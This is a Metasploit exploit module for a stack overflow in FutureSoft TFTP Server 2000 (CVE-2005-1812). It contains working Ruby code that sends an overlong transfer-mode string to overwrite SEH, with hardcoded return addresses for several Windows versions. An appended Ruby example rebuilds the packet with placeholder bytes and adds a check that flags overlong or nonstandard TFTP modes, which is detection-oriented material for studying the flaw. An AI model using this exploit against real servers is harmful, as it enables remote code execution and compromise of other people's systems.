GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/tftp/futuresoft_transfermode.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'FutureSoft TFTP Server 2000 Transfer-Mode Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in the FutureSoft TFTP Server
        2000 product. By sending an overly long transfer-mode string, we were able
        to overwrite both the SEH and the saved EIP. A subsequent write-exception
        that will occur allows the transferring of execution to our shellcode
        via the overwritten SEH. This module has been tested against Windows
        2000 Professional and for some reason does not seem to work against
        Windows 2000 Server (could not trigger the overflow at all).
      },
      'Author'         => 'MC',
      'References'     =>
        [
          ['CVE', '2005-1812'],
          ['OSVDB', '16954'],
          ['BID', '13821']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'           => 350,
          'BadChars'        => "\x00",
          'StackAdjustment' => -3500,
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          ['Windows 2000 Pro English ALL',   { 'Ret' => 0x75022ac4 }], # ws2help.dll
          ['Windows XP Pro SP0/SP1 English', { 'Ret' => 0x71aa32ad }], # ws2help.dll
          ['Windows NT SP5/SP6a English',    { 'Ret' => 0x776a1799 }], # ws2help.dll
          ['Windows 2003 Server English',    { 'Ret' => 0x7ffc0638 }], # PEB return
        ],
      'Privileged'     => true,
      'DisclosureDate' => '2005-05-31'))

    register_options(
      [
        Opt::RPORT(69)
      ])
  end

  def exploit
    connect_udp

    print_status("Trying target #{target.name}...")

    # TFTP read request (RFC 1350): 2-byte opcode (1 = RRQ), NUL-terminated
    # filename, NUL-terminated transfer mode. The 14-byte filename is benign;
    # the oversized mode field is the overflow vector.
    sploit  = "\x00\x01" + rand_text_english(14, payload_badchars) + "\x00"
    sploit += rand_text_english(167, payload_badchars)

    # generate_seh_payload returns the SEH record (short jump over the handler
    # address, then the handler address) followed by the encoded payload. It is
    # written at packet offset 157, i.e. 140 bytes into the mode string, and
    # extends the string if the payload runs past the end.
    seh = generate_seh_payload(target.ret)
    sploit[157, seh.length] = seh

    # Terminate the mode string.
    sploit += "\x00"

    udp_sock.put(sploit)

    handler
    disconnect_udp
  end
end
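The following is an added example in Ruby, not part of the Metasploit module above or of the framework. It rebuilds the packet layout the module sends (opcode, 14-byte filename, NUL, 167-byte mode string with an SEH record 140 bytes in) using constructed placeholders: 0xCC marker bytes stand in for shellcode and 0x41414141 for the handler address. It then parses the request back the way a C-string-based server would and applies the check a defender would want: a transfer-mode field that is not one of the RFC 1350 modes, or longer than any of them, is not a real client. The offsets, the mode list and the 8-byte length threshold are assumptions stated in the comments.

```ruby
# Added example; not part of the Metasploit module or framework. Offsets mirror
# the module's packet layout; LEGIT_MODES and the length threshold are assumed.

TFTP_RRQ = 1
TFTP_WRQ = 2
MODE_OFFSET_IN_PACKET = 17    # 2-byte opcode + 14-byte filename + NUL (module layout)
SEH_OFFSET_IN_PACKET  = 157   # where the module writes the SEH record
LEGIT_MODES = %w[netascii octet mail].freeze   # RFC 1350 transfer modes

# Build an RRQ shaped like the module's, substituting constructed 0xCC marker
# bytes for shellcode and a placeholder handler address (0x41414141).
def build_overflow_rrq(ret = 0x41414141, shellcode = "\xcc".b * 16)
  filename = ('A' * 14).b
  mode     = ('B' * 167).b
  pkt = [TFTP_RRQ].pack('n') + filename + "\x00".b + mode
  # SEH record as Msf::Exploit::Remote::Seh builds it: a 2-byte short jump
  # over the handler address, 2 bytes of padding, the handler address, then
  # the payload. Writing at offset 157 grows the string if the payload is long.
  seh = "\xeb\x06\x90\x90".b + [ret].pack('V') + shellcode.b
  pkt[SEH_OFFSET_IN_PACKET, seh.bytesize] = seh
  pkt + "\x00".b
end

# Parse an RRQ/WRQ the way a C-string-based server would: opcode, then the
# filename and mode up to their first NUL each. Raises on anything else.
def parse_tftp_request(pkt)
  pkt = pkt.b
  raise ArgumentError, 'packet too short' if pkt.bytesize < 4
  opcode = pkt[0, 2].unpack1('n')
  unless [TFTP_RRQ, TFTP_WRQ].include?(opcode)
    raise ArgumentError, "not a RRQ/WRQ (opcode #{opcode})"
  end
  filename, mode, _rest = pkt[2..].split("\x00".b, 3)
  raise ArgumentError, 'filename or mode not NUL-terminated' if mode.nil?
  { opcode: opcode, filename: filename, mode: mode }
end

# Detection check: a mode that is not an RFC 1350 mode, or is longer than the
# longest legitimate one (8 bytes, "netascii"), cannot come from a real client.
# The module's 167-byte mode field trips both conditions.
def suspicious_mode?(req, max_len = 8)
  m = req[:mode].downcase
  !LEGIT_MODES.include?(m) || m.bytesize > max_len
end

# Offset of the SEH record measured from the start of the mode string.
def seh_offset_in_mode
  SEH_OFFSET_IN_PACKET - MODE_OFFSET_IN_PACKET
end

# Recover the handler address a packet would install (bytes 4..7 of the record).
def seh_handler_address(pkt)
  pkt.b[SEH_OFFSET_IN_PACKET + 4, 4].unpack1('V')
end

if __FILE__ == $PROGRAM_NAME
  pkt = build_overflow_rrq(0x75022ac4)
  req = parse_tftp_request(pkt)
  puts "mode length: #{req[:mode].bytesize}, suspicious: #{suspicious_mode?(req)}"
  puts format('handler address: 0x%08x at mode offset %d',
              seh_handler_address(pkt), seh_offset_in_mode)
  benign = parse_tftp_request([TFTP_RRQ].pack('n') + "boot.bin\x00octet\x00")
  puts "benign mode: #{benign[:mode]}, suspicious: #{suspicious_mode?(benign)}"
end
```

Everything is built as binary (`String#b`) so that the handler-address bytes from `pack('V')` never collide with Ruby's UTF-8 literal encoding; the same rule applies when adapting a module payload by hand. The parser truncates the mode at its first NUL, which is why the module excludes `\x00` from the payload bad characters and why the SEH record is written in place rather than appended.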